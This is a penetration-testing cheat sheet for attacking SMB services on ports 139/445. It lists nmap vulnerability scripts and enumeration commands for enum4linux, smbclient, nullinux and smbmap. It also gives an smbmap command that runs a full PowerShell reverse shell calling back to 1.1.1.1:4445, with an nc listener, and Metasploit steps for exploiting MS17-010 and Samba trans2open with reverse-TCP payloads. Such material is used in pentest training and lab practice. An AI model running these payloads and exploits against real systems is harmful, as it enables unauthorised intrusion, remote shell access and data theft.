139/445 - SMB

General Informations

SMB1 => Win2000 / XP / 2003
SMB2.0 => Vista / 2008
SMB2.1 => Win7 / 2008R2
SMB3.0 => Win8 /  2012
SMB 3.02 => Win8.1 / 2012R2

# Configuration tips
# Can be usefull to configure /etc/samba/smb.conf with:
client min protocol = SMB2
client max protocol = SMB3

# Then
service smbd restart


Identification

# Port 139
# Using nbtscan to identify host/domain
nbtscan IP   (identifier le nom/domaine)

# Identity SMB2 support using metasploit
use auxiliary/scanner/smb/smb2
set RHOST IP
run

# Discover real samba version if hidden     
ngrep -i -d tap0 ‘s.?a.?m.?b.?a.*[[:digit:]]& smbclient -L //IP


### Services and Resources Scanning


# Base nmap
nmap -v --script=xxxx -p T:139,445 <IP>

# Hard nmap
nmap -n -sV --version-intensity=5 -sU -sS -Pn -p T:139,445,U:137 --script=xxx <IP>

# SMB Relate NSE Scripts
# Try to retrieve NetBIOS and MAC
nbstat

# Enum
smb-enum-domains
smb-enum-groups
smb-enum-processes
smb-enum-sessions
smb-os-discovery
smb-server-stats
smb-system-info

# Attempts to retrieve useful information about files shared on SMB volumes
smb-ls

# Queries information managed by the Windows Master Browser
smb-mbenum

# Try to print something
smb-print-text

# Get security level information about SMB
smb-security-mode

# Vulns
smb-vuln-conficker (dangerous, can crash target)
smb-vuln-ms06-025 (Buffer overflow in RRAS)
smb-vuln-ms07-029 (Buffer overflow which can crash the RPC intrface in the DNS Server)
smb-vuln-ms08-067 (Buffer overflow/RCE. Dangerous, can crash the target)
smb-vuln-ms10-054 (Remote Memory Corruption. Result is BSOD -> DANGEROUS)
smb-vuln-ms10-061 (Print vulnerability. Safe and can\'t crash the target)
smb-vuln-ms17-010 (RCE, just checking if vulnerable)


Enumeration

# Get NetBIOS from IP
nmblookup -A <IP>


# Enumeration using enum4linux
enum4linux -a -R 500-600,950-1150  (identifier le nom/domaine + users + shares)


# Smbclient
# List shares
smbclient -L //IP
smbclient -L <ip>

# Connect
smbclient \\\\x.x.x.x\\share
smbclient -U “DOMAINNAME\Username” \\\\IP\\IPC$ password

# Specify username and no pass
smbclient -U “” -N \\\\IP\\IPC$


# Nullinux for users and shares
nullinux -users -quick DC1.Domain.net
nullinux -all 192.168.0.0-5
nullinux -shares -U 'Domain\User' -P 'Password1' 10.0.0.1,10.0.0.5


# Smbmap for domains (List share drives, drive permissions, share contents, upload/download functionality..)
# Basic enumeration (password or NTLM hash)
python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1

# Remote command execution
python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

# Non-recursive path listing
python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'

# File content searching
python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'

# Drive listing
python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L 

# Nifty Shell
python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""1.1.1.1""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 

# Attackers
nc -l 4445


MS17-010 Exploitation

# Using metasploit   
(IMPORTANT MS17_010_PSEXEC is a staged payload, means you need meterpreter !)
(IMPORTANT 2, if object can\'t be found, try to modify your target !)
use exploit/windows/smb/ms17_010_psexec
set SHARE ADMIN$
set SMBDomain ALICE
set ALLOW_GUEST true
set LPORT 445
set LHOST 10.11.0.179
set RHOST 10.11.1.5
set TARGET 3       (TARGET 1 = PowerShell / TARGET 2 = Native / TARGET 3 = MOF => besoin du share ADMIN$)
set PAYLOAD windows/shell/reverse_tcp
set VERBOSE true
set DBGTRACE true
set EXITFUNC thread
exploit -j


Trans2open Exploitation

# Samba 2.2.X are usually vulnerable to trans2open
# Using metasploit
use exploit/linux/samba/trans2open
set VERBOSE true
set PAYLOAD linux/x86/shell_reverse_tcp
set RHOST IP
set LPORT 443
set LHOST IP
exploit -j -z


# You can mount the root fiilesystem to a share you can access
https://www.exploit-db.com/exploits/33599

# Using metasploit
https://www.exploit-db.com/exploits/33598
use auxiliary/admin/smb/samba_symlink/traversal